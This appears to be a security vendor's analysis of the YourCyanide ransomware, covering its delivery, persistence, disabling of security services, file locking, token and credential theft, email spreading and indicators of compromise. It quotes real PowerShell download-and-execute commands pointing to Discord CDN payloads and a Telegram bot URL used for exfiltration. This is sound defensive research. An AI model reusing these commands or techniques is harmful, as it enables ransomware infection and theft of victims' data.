Authors: Anandeshwar Unnikrishnan, Rishika Desai, Benila Susan Jacob

Executive Summary

CloudSEK’s contextual AI digital risk monitoring platform XVigil came across CMD-based Ransomware strain YourCyanide being exploited in the wild. YourCyanide uses Discord, Microsoft Office and Pastebin as part of its payload download mechanism by making Discord attachments and URL requests.

An analysis into the impacts of the ransomware reveals that it can be utilized to compromise confidential business details, practices and IP. There is also a potential risk of takeover or shutdown of company operations resulting in loss of revenue and reputation.

The mitigation measures consist of auditing and monitoring logs of events and incidents to identify unusual patterns and behaviour. There has to be a systematic mechanism of enforcing data protection, back and recovery. Additionally security configurations on network infrastructure devices like firewall and routers have to be implemented.

Analysis and Attribution of YourCynaide

CloudSEK’s Threat Research team has conducted an investigation into the new and sophisticated ‘YourCyanide’ ransomware, which is being exploited in the wild.

This CMD-based ransomware strain is distributed primarily as a Discord attachment and makes URL requests to Microsoft Office and Pastebin. Researchers at Trend Micro discovered that the roots of YourCyanide can be traced back to the GonnaCope ransomware family that first surfaced in April, 2022.

The ransom note is dumped by the malware into “YcynNote.txt”

Features of the Malware

CloudSEK’s Threat Research team discovered the following features of YourCyanide ransomware and its operators:

The ransomware execution file is delivered as a Discord attachment as shown below:

Ransomware delivery: (new-object net.webclient).downloadfile(“https://cdn.discordapp.com/attachments/971160786015772724/971191444410875914/GetToken.exe”, “GetToken.exe”)

Ransomware delivery: (new-object net.webclient).downloadfile(“https://cdn.discordapp.com/attachments/974798125011198003/976894591552860220/NoKeyB.exe”, “NoKeyB.exe”)

The obfuscated file of YourCyanide, when deobfuscated fetches the executable GetToken.exe.
The ransomware encrypts files and renames them with a .cyn extension.
The .cmd file of YourCyanide module is dropped by another malicious file CaffeJuice.exe.
The ransom note path is C:\Users\Admin\Desktop\YcynNote.txt.
YourCyanide ransomware note
The threat actor shares their name, BTC wallet address, contact channel and number of files encrypted in the ransom note.
The ransomware group usually demands USD 500 from their victims to restore their files.

Association with APT/ Other ransomware groups

The YourCyanide sample available, indicates that it could be a variant of the Kekpop ransomware (also known as Kekware); the ransomware drops an ‘other.txt’ file that mentions Kekpop. Our research also confirms that the same Get.exe executable is used to deliver Kekpop and YourCyanide ransomware.

One of the files that get dropped during YourCyanide ransomware attack

Another similarity that links Kekpop and YourCyanide is the ‘black.bat’ file that is dropped in both instances.

Technical Analysis of the YourCyanide Ransomware

Initial Execution

A malicious LNK file “powershell.exe.lnk” executes a Powershell command that retrieves the executable “YourCyanide.exe” from the Discord server, and executes it on the victim system to launch YourCyanide ransomware.

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command “(New-Object Net.WebClient).DownloadFile(‘https://cdn.discordapp.com/attachments/974799607894769704/975527548983341056/YourCyanide.exe’, ‘YourCyanide.exe’)”; start YourCyanide.exe

Delivery Mechanism – Dropper

The malicious binary YourCyanide.exe, downloaded by the LNK file, acts as a ransomware dropper. It performs the following operations on the system:

YourCyanide.exe creates a new directory “IXP000.TMP” in the user’s Temp directory.
It dumps YourCyanide.cmd into the newly created directory. The contents of the file are shown in the following image.
The dropper executes the batch script to fetch contents from Pastebin and saves it as YourCyanide.cmd, which is the actual ransomware written in batch script.

Before exiting, the dropper deletes the dropped file and the directory in Temp.

Persistence

The main ransomware code fetched from Pastebin is heavily obfuscated with multiple layers of string substitutions and slicing, to hinder its analysis or detection.

A further analysis of the deobfuscated code shows that the batch program sets its system and hidden attributes as shown below:

The hidden attribute, when set, hides the corresponding file from the user, while the system attribute deceives the operating system to treat the file as crucial. Thus, at the event of alteration or deletion, such files remain unaffected similar to system files.
The malware achieves persistence through the following AutoStart Extensibility Points:
- Run Registry Key
- Startup Folder

Encryption Process

The malware creates a new value “rundll32_474_toolbar” under Run Key in the registry and provides the name of the malicious batch file as data for the new registry entry. Finally, a copy of the malware is saved in the Startup folder. Once the malware achieves persistence, it creates a new batch file “AuToexEc.BAT” in the C:\ drive.
The BAT file consists of the command to start a new process of the same malware copy. Later the Task Manager is disabled through the registry. All of these operations are shown in the image below.

The malware also checks for the existence of AUTOEXEC.BAT on the victim system. And if found, it is replaced with itself as shown below. In the older DOS system AUTOEXEC.BAT was used as an auto execution mechanism, post the system boot.

Additionally, the ransomware checks for the analysis environment by verifying the username. These usernames are all taken from popular sandboxes on the internet. The malware exits the system if the username matches any of the usernames mentioned in the code below.

A file named “black.bat” is dropped in the user’s Documents directory. The contents are dynamically written into the dropped batch as shown below. The dropped batch file executes a black screensaver by calling the scrnsave.scr file. The execution of the file causes the user’s screen to go blank.

Target Services

The malware terminates the following services on the target system:

Services Targeted
WinDefend Wuauserv Norton AntiVirus Firewall Monitor Service McAfee SecurityCenter Update Manager crmonsvc ccSetMGR Symantec Network Drivers Service MpfService helpsvc Symantec Symantec Core LC Norton AntiVirus Auto Protect Service Norton AntiVirus Server McShield InoRT Norton AntiVirus Client PC-cillin Personal Firewall McAfee.com VirusScan Online Realtime Engine Sophos Anti-Virus eTrust Antivirus Realtime Server net stop netsvcs	Security center Automatic Updates McAfee Spamkiller Server Symantec SPBBCSvc MonSvcNT ccEvtMGR Norton Unerase Protection mcupdmgr.exe ERSvc McAfee navapsvc Norton AntiVirus Client NAV Alert DefWatch InoTask norton AntiVirus Corporate Edition Trend Micro Proxy Service SyGateService Sophos Anti-Virus Network Sygate Personal Firewall Pro Spoolnt	Symantec Core LC SAVScan McAfee Personal Firewall Service Ahnlab Task Scheduler NProtectService srservice MskService McAfeeAntiSpyware norton ccPwdSvc Serv-U Symantec AntiVirus Client Nav Auto-Protect eventlog norton AntiVirus Auto Protect Service ViRobot Professional Monitoring McAfee.com McShield Sygate Personal Firewall Pro eTrust Antivirus Job Server eTrust Antivirus RPC Server

Tasks

The malware terminates the following running processes on the system:

Running Processes Targeted
MSASCui.exe Excel Msaccess Outlook Fiirefox	Iexplore ITunes Safari tskill WINWORD LimreWire	Msnmsgr Calc Mspaint Msnmsgr

Data Manipulation

After terminating various protective services and running tasks, the malware locks the data on the target system as shown below. The following directories and its sub directories are traversed to perform locking:

Desktop
Documents
Music
Pictures
Videos
Downloads

The files are renamed to a random number obtained from multiplying random numbers, followed by which an extension of “cyn” is appended. Once the files are renamed, random data is written to the user file.

The malware drops another batch file named “2b2crypt.cmd” to lock Minecraft related data as shown below. The logic used for locking is the same as seen before. The “.minecraft” and “.minecraft\mods” directories are targeted by the malware as shown below. After writing the contents of the batch file, it is executed to initiate locking of the data.

The Logger Script

Using Powershell, the malware retrieves another batch file “ycynlog.cmd” and executes it on the target system.

The “ycynlog.cmd” is heavily obfuscated with the same logic used for the main ransomware batch file. The batch instructions hosted on Pastebin are shown below. This malicious script acts as a user data logger and sends the data to a Telegram bot (https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538).

The ycynlog.cmd script just like the main ransomware script initiates the execution by setting Run registry keys to achieve persistence on the target system and also drops the ycynlog.cmd file in the Startup folder.
The logger script downloads an additional executable file hosted on Discord CDN and executes it on the system.

GetToken Binary

GetToken is a C#/ .NET program used to steal users’ Discord tokens. The stealer contains hard coded directory paths to Discord and various web browser’s local storage as shown in the image below.

The tokens are identified by using Regex pattern matching as shown below. If a match is found, the stealer checks the validity of the token by calling the function TokenUtil.checkToken.

The token validity is performed by connecting to the Discord server and monitoring the server response. The token checking routine is shown below. The valid tokens are returned to the caller function.

The stealer creates a file Tokens.txt on the victim system and dumps all valid tokens found. If there are no tokens present, the value that gets written into Tokens.txt is “Retard Has No tokens.” The ransomware finally sends the Token.txt to the Telegram bot.

The global IP address of the victim is retrieved by sending a request to https://ipv4.wtfismyip.com/text through curl and the output is stored as IP.txt.
The script retrieves a list of installed applications on the system and stores it in apps.txt to later send it to the Telegram bot.
WMI is used extensively to retrieve system level information from the user. The following list summarizes the data enumerated by the script:
- Username
- IP address (local)
- Network configuration data
- MAC information
- CPU data
- Physical memory data
- Disk information like partition details
- Windows system information
- Windows license information (Product Key)
The above data along with Tokens.txt generated by GetToken.exe are sent to the Telegram bot. Additionally, the logger scripts steal the following Minecraft specific user data:

- Launcher_msa_credentials.bin
- Launcher_msa_credentials_microsoft_store.bin
- Launcher_accounts.json
- Launcher_accounts_microsoft_store.json
- Launcher_product_state.json
- launcher_profiles.json
Using Powershell the logger script downloads ForMe.txt from Google Cloud and executes it on the system.

The ForMe.exe dumps data into ForMe.txt which is later pushed to the Telegram bot. Unfortunately, at the time of our analysis the Google Cloud link did not serve the file. Our research indicates that it could be a browser password stealer.
The ransomware script then drops a batch file named “fuckports.cmd.” Instructions to add custom firewall rules are written into the batch file as shown below. The following firewall rules allow inbound UDP traffic to port 2835 and outbound UDP traffic through 16981.

The malware adds itself into the win.ini and system.ini files. These files contain configuration files to start up programs and other settings after a system boot. The malware drops two batch files, “confession.bat” and “Check This Out.bat,” that have identical purposes.

YourCyanide is also capable of spreading via mail. It utilizes Visual Basic APIs to communicate with Microsoft Outlook and sends out a copy of itself as mail attachment. The malware then drops “loveletter.vbs” in the Documents directory.
The VB script retrieves the user’s address list and sends out an email with the subject “I have a crush on you” and a message that states “read me.” The mail attachment contains a copy of the ransomware batch program.

Ransom Collection

The malware drops an additional vbs file named “mail.vbs” with the same contents as mentioned above. However, it will send an email with the subject line “Check This Out.”

The ransomware uses the Powershell Out-Printer commandlet to print out multiple copies of the ransom note.

The malware also copies itself to other drives present on the system as shown below:

Notably, YouCyanide changes the file association of vbs, sln, js, css, and ini. Upon opening such files, the system transfers their control to an associated program. The malware associates listed file types with itself. The malware is executed when similar file types are opened.

The malware enables remote desktop on the target system as shown below and starts the TermService or terminal service which is responsible for handling RDP related tasks.

Finally the ransom note is displayed to the user and creates an autorun configuration for available drives on the system that leads to execution of the malware itself as shown below.

Impact & Mitigation

Impact

Mitigation

Stolen credentials could allow access to the organization’s networks.
Exposed Personally Identifiable Information (PII) could be used to orchestrate social engineering schemes, phishing attacks, and even identity theft.
Exposed credentials could be leveraged to access users’ other accounts, owing to password reuse.
Exposed data could reveal business practices and intellectual property.

Use proactive threat intelligence to prevent and alert users of potential threats and to strengthen external security posture.
Reset compromised login credentials and implement a strong password policy for user accounts.
Use MFA (multi-factor authentication) across logins.
Check for possible workarounds and patch all vulnerable and exploitable endpoints while keeping ports open.
Monitor for anomalies that could be indicators of possible takeovers.

Indicators of Compromise (IoCs)

SHA256
9e973f75c22c718c7438bc1d4614be11ae18e2d5140ecc44c166b5f5102d5fbe c5d842735709618ee4f2521c95bf029a0690c3cbe5f7a06a916f633ebe09dd50 6A645F72ACF1D6C906E8C844E4E8B3FC92C411BF69937CFE7069DF2CC51B8A4E 6AD08FE301CAAE18941487412E96CEB0B561DE4482DA25EA4BB8EEB6C1A40983 6ab0e2e13c32b18b06b9b93b1fe607a7e04a5c0ba09816c36fba1573a47ded91 f8860ce270a2dec3ae1c51ff2c9aea5efe0015d519ebac4ca4c1ac0d97e73323 8f0dbf9a6841ced62d7f5c130f420bd5a2b39141097fefba9727034d1bf3b402 67a1e573955304887d30ff924eb01ba8a60a188835d7275265ecc716360fb0cf a3523e2ba2c221593a0c16640bfeef8cd146f747fa62620cc2834e417578c34c 0ed64dd6e08e5b9c9282966f439ab8881b4611052838db1ef79fabc38b8a61d2 298c325bbc80af8b3ac77365dd7cc3f97000a8377f36937d8563ab743a92b21c 07fab8134ff635078cab876dba1e35c536936d193a3667637e0561c6efbb0a85
	URL
	https://pastebin.com/raw/2K5m42Xp https://cdn.discordapp.com/attachments/971160786015772724/971191444410875914/GetToken.exe https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538 https://ipv4.wtfismyip.com/text	https://doc-0k-0k-docs.googleusercontent.com/docs/securesc/hg4h2398q99ghdi837vesvkmkv3nlr6u/ai385da1543uhdsi9bioneodrj6ljsd0/1652563275000/10334864966473916138/10334864966473916138/1qubjLFibSRfpNaX8z2SkwfHMiaQGKkn5?e=download&ax=ACxEAsayVkeHdNE6Rd2bptmdqZSTVYKwRPoiFNDJuQVnig_FKMx1vCzDipGZR7IOdO-2g1gOL15FljJPButVcD1jYwAdz9PxfiRxRrf-IXEkxwIn-KYy0NfynS5Us2LkVa8lUVIgCh3AETDK76rTtUf2Yv77eLHmSWmY57tXc_sPH9QpvJSYgJ_RdbREqd4SAbnWHFihxQMttNZe7vjevvlVc0nAwXWhmoXnCdTJpoN0OOQbhl8PmoHcm03iAReIe_KnHS9uuidU_VxCPtmQU97uGRj-XxZFqfTRF5kFTSf7YukXosSBxivgSZbaXMD0fWkmh1Gw51Waxqfc5G0I_hQpGMF3xzwIvB2FmHyN-A2nefhWVQAuoPcqNyNXOQq2UULaGDCqjYX4X_ehWRSCMfdDl7tZs9U2E-cqfI
			Domain
	Pastebin	Wtfismyip
	Discordapp	Telegram